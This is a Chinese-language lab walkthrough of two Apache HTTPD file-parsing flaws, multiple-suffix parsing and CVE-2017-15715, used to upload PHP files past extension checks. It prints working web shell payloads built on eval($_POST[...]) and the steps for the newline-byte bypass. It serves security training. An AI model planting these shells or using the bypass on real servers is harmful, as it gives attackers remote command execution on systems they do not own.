一.apache_parsing
原理:Apache HTTPD ⽀持⼀个⽂件拥有多个后缀,并为不同后缀执⾏不同的指令。在Apache1.x/2.x中Apache 解析⽂件的规则是从右到左开始判断解析,如果后缀名为不可识别⽂件解析,就再往左判断。如 1.php.xxxxx
打开靶场
data:image/s3,"s3://crabby-images/1277f/1277f2fafdd8c294da6e7c78f3b73e8dc9ba0512" alt=""
创建一个名为1.php.jpg的文件,内容输入
<?php fputs(fopen("shell.php","w"),'<?php eval($_POST["cmd"]);?>')?>
上传。。。
他会生成一个内容是<?php eval($_POST["cmd"]);?>名为shell.php的文件
data:image/s3,"s3://crabby-images/05d6a/05d6ae38b95a51366b82d0100b5cceb2a6b3988b" alt=""
我们拼接网址访问
data:image/s3,"s3://crabby-images/458f1/458f13d4568b9791e0a45ce4adf72546c6d3c32f" alt=""
测试是否上传成功
data:image/s3,"s3://crabby-images/3d96b/3d96b74500a5b60466b2824a77abef40c6dd9899" alt=""
二.CVE-2017-15715
原理:Apache HTTPD是⼀款HTTP服务器,它可以通过mod_php来运⾏PHP⽹⻚。其2.4.0~2.4.29版本中存在⼀个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进⾏解析,导致绕过⼀些服务器的安全策略。
影响版本:2.4.0~2.4.29
进入靶场
data:image/s3,"s3://crabby-images/b2142/b2142a16d86950e0abedc3d1b5e2c636ea0d9be6" alt=""
创建一个内容为<?php @eval($_POST['a']); ?>名为1.jpg的文件
上传,抓包
data:image/s3,"s3://crabby-images/567c3/567c3c78eabd4bc7856874e8df7a2ada820a84b0" alt=""
在evil.php⽂件后⾯添加空格
data:image/s3,"s3://crabby-images/6ba45/6ba45a21213708b69e774480ba0be4fb8a9800ab" alt=""
在到HEX中找到evil.php的那一行,把20改成0a
data:image/s3,"s3://crabby-images/1ffc7/1ffc794196bca9870e87b85a351b856d3223477e" alt=""
放行,访问evil.php%0a
data:image/s3,"s3://crabby-images/c6e65/c6e6519a3757fe93e2f226c2406d9801fd0360c6" alt=""
写入成功!!!